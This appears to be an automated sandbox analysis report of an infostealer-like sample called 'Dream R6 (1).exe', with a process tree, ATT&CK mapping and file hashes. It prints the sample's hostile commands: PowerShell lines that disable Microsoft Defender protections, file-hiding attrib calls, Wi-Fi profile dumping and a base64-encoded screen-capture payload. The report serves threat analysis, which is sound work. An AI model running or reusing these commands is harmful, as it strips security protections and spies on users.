PID 2444 wrote to memory of 4564	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	94
PID 2444 wrote to memory of 3292	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	95
PID 2444 wrote to memory of 3292	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	95
PID 2444 wrote to memory of 4916	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	96
PID 2444 wrote to memory of 4916	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	96
PID 2444 wrote to memory of 4320	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	97
PID 2444 wrote to memory of 4320	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	97
PID 2444 wrote to memory of 3404	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	98
PID 2444 wrote to memory of 3404	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	98
PID 2444 wrote to memory of 2560	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	99
PID 2444 wrote to memory of 2560	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	99
PID 2444 wrote to memory of 1052	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	100
PID 2444 wrote to memory of 1052	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	100
PID 2444 wrote to memory of 4480	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	101
PID 2444 wrote to memory of 4480	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	101
PID 2444 wrote to memory of 1788	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	102
PID 2444 wrote to memory of 1788	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	102
PID 2444 wrote to memory of 1520	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	103
PID 2444 wrote to memory of 1520	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	103
PID 2444 wrote to memory of 1944	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	104
PID 2444 wrote to memory of 1944	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	104
PID 1944 wrote to memory of 2404	1944	powershell.exe	105
PID 1944 wrote to memory of 2404	1944	powershell.exe	105
PID 2404 wrote to memory of 3316	2404	csc.exe	106
PID 2404 wrote to memory of 3316	2404	csc.exe	106
PID 408 wrote to memory of 4052	408	chrome.exe	119
PID 408 wrote to memory of 4052	408	chrome.exe	119
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120
PID 408 wrote to memory of 4524	408	chrome.exe	120

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4480	attrib.exe
1520	attrib.exe
2300	attrib.exe
5056	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Dream R6 (1).exe
"C:\Users\Admin\AppData\Local\Temp\Dream R6 (1).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4968
- C:\Windows\system32\cmd.exe
  cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe
    C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Maps connected drives based on registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe
      4⤵
      Views/modifies file attributes
      PID:2300
  - - C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      4⤵
      Views/modifies file attributes
      PID:5056
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1936
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3292
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      4⤵
      PID:4916
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      4⤵
      PID:4320
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2560
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1052
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4480
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1788
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1944
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fgpenwup\fgpenwup.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2404
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC62E.tmp" "c:\Users\Admin\AppData\Local\Temp\fgpenwup\CSC138F0812606943FDAAFDE81F4E9BCB11.TMP"
        6⤵
        
        PID:3316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8dbf7cc40,0x7ff8dbf7cc4c,0x7ff8dbf7cc58
  2⤵
  PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2004,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2000 /prefetch:2
  2⤵
  PID:4524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1672,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2036 /prefetch:3
  2⤵
  PID:1704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2264 /prefetch:8
  2⤵
  PID:1844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:4084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4632,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4648 /prefetch:1
  2⤵
  PID:1336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4528,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4904 /prefetch:8
  2⤵
  PID:4312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4576 /prefetch:8
  2⤵
  PID:1356

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
22b21c686e22e4bc4d0e48049fa77768

SHA1
9b012716dc32f554d041d0023f79de9e32368bd8

SHA256
44820ca83a0806a2203b2f905d57d50dea95c2cf68acb9abeb55e6ef6035740c

SHA512
a712fed5b5383cf3d5284c63630246a251ec3ffbe6efd798b61e457782c64a23148bd88e3ab6ac90c5067ff1c6e695355a43585186c3dad222bb6a78eb496821

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
138fc524b0344e9fee0ad97089cb4807

SHA1
ea5b9a401eff9e4d225a31520fb0376e537facd0

SHA256
642c8a249ab9ef9e1692d01fe82db692587e96ef81c82b70723386c2e1d276ba

SHA512
fbb6b8bdfbf004faf3245a91358375b8f6d3ffe90c4691646d701aae23a3d5ba5dbd1d0e448e7a6c62118a7efda3744b8aab99b476c0cd6848ec426ec21a95bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
81c31be16e96d572705ba6ee5568501a

SHA1
48fdcec1a9930a028265598868113ebeaea998d6

SHA256
eac6851d74fdc9f02e4cfd65c3d757c8ff17eace3126e796d10025edfa24f386

SHA512
b97fc78eb1babe4f0d4f60db0d2c2854a30e3dba5a290c1d5207fdaf4bd545468e0f7c08b09595e4071b835fe0b3454fbabc2b6c50eeac32191450707f13b825

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0fcf4e2088db6732f0dd4d5013760587

SHA1
d128f4a46a5bdd2a30c0cddecd826ed82b09ba72

SHA256
bbc2887a1676a7898362780c8865f128627d26c2d2c7ce91fa862a7b437d7f0b

SHA512
5e3b9af96c99abbd6fa76b5321aacc4a8579fd4b9b680ffbcc5c71b632ec0bc1d47fa1035c2faa28e7bf2da45d02e983b99f1b21638bca6c332206513f887f7c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
85601d52d0e741ed21e21c100acb1cf2

SHA1
d80eccf918adb8726ad1772d6ed5c5039e6466ca

SHA256
d978ce5038c6e0c1dfb8c593c430a253157a52e8b6c7c01366e05aef69eac3eb

SHA512
09eab83d8d2ca9167df3802b475cb0633f9739d6466bc9df09dcac3294acfb05db8870efff4acf8abddc06a54378497d717c7527e7917fa3b880f1cdda97c94b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
384b16c69f36932d29ec8da1f10d836b

SHA1
519b3965b7f0cd457e7da61ddca2af64072c60a7

SHA256
9e636aec62dc16fe3cf05c9d09bd6b6865b314a55595ed82d490419cdef2b0ae

SHA512
e80dd3f8a49bf45b1cc00a92c69cc94847b9adc00789b938443535bc11fa673d6f1e625774e6d36e0c8e4596f2c6ee3856ce8a7f71fcf3113ab100a9becc8773

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
0abd121e892979be04bdfc70b79e5d2e

SHA1
5cec4f75503d77500426b31f501294b57157c520

SHA256
2ac744d69fafda7e6c0068a7b0bbe222d790414264a1fdfd5ccb7d5aa4aadc9a

SHA512
c9f712a9fa88d00b45363fdeed0413dfd26f5a8e49cb29f13c87733dccc33c0578694786096a733e1710f1fcf4979485423fa64dc1fb51b57fd64c00f9deb974

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
f671028d29ce479cb03955b63e28060f

SHA1
6df6d81868cf77cc5b2d9e860126fde93ff228be

SHA256
d5b21b64499b94725ac370f156231c797ad3a01f9dfc1165060909e19dcfa939

SHA512
a9f49ed1ebbe5018041d86f3396937bd214ae2c15e746f17052699035c869dc69ce9c6ba1363fe7f520caa70cc64ac327ed98012a925f4f59d2a23b30bfcc06d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ee9f310fdfc7da86a62ccc4ef33d5afc

SHA1
d7bb5aeff25910f75c7ef9b57fbed906c355d0e1

SHA256
0ff5818a0647208ea67f4df6adc7dff87db1c9a5b0fca90b9212b8f9d81a35c5

SHA512
b5eccbaaa5a53b8a684a19a0d45fcdb7ec814392c35832acd47591713dd4f5e54a31fc41637ca78629fe6f0723dc9d989b05bac61764b4ef8f10739d78383230

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
5b26519501ae8fddfe192324bb7cbd0c

SHA1
8eddcd0e8ae14432496cd58173f6cfe95a928c24

SHA256
8298fd3f2476f722bc010a92cdb4391303fff898929ec467b17b51325437e77b

SHA512
94287a482485f605073bfd9c5463c322df16dc837905614a1435808042e275ad81d11a018384c04440ff9d2adea8fca43f692bd8c4c0519f229a57cf6e27b94b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
201KB

MD5
17dc289b7169d88065803b866c07a9e7

SHA1
6a8f9f2c385225f2bcc3d4fc030ca43000589008

SHA256
36d1d3e064691a9c251c01e966e75a3e53c916b42dbc376c6f98425467b8acf5

SHA512
0b23a013e7a524a370a8efd6278a5245bbc7daee03d35dc58aa3a1265a2456f0a70c34556d9ba2312db95c49183b5b5cc45f21af22192959e30694130a1e84e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
201KB

MD5
0e23f566a884232bf70ef0afb22e81c4

SHA1
3d12a9337d2fa5aeaab36e63d0f0f8159e1a3772

SHA256
341abe8bf7fa94b2aba436ad062ba9a74e2fdfcd43c00add6cd2f45cb439188b

SHA512
0479b3131f3b11a1c57c06e271640f717fb099d17e8056a5c07dbfeb7827ad4c34af4ecc6a4184f635d92c1010be5c7576d0e30bb3828f04f2f7167a6cd7ca44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe

Filesize
9.9MB

MD5
1794788462c41d14e2659260f134a304

SHA1
e977afbac54e557b917abe2604eddee4c72fe297

SHA256
8f2f5de00ac8de98139e3c9a802bedae0368714ea3714eba37ef5778bff86a9d

SHA512
941d567e3316a4388d3554b14a1bf9af8254475811559b253dc9428b1e9c2de4d7d1f307fec9719b2c5968d3893d204d5d189fe312afe5913ff17572bbae2aff

Download Submit
C:\Users\Admin\AppData\Local\Temp\KI16VAYtQ6\Display (1).png

Filesize
419KB

MD5
d2923405b2760b7a0b7ad9d72b7accb9

SHA1
04ebd46a89d5d62d4db3a16d2ef3f961adbc9ced

SHA256
5e1e432132ee4194dbc5c7a8c272480c10c5737413d83db5b2011b05ebbd1bb8

SHA512
5d9398e077246780633541ce8437e2140e75b385362893b1111015f2082a734331e867553daeca9900ca1e698fd1f2cf2ffc93caa3faddfb153db3d97f8c7822

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC62E.tmp

Filesize
1KB

MD5
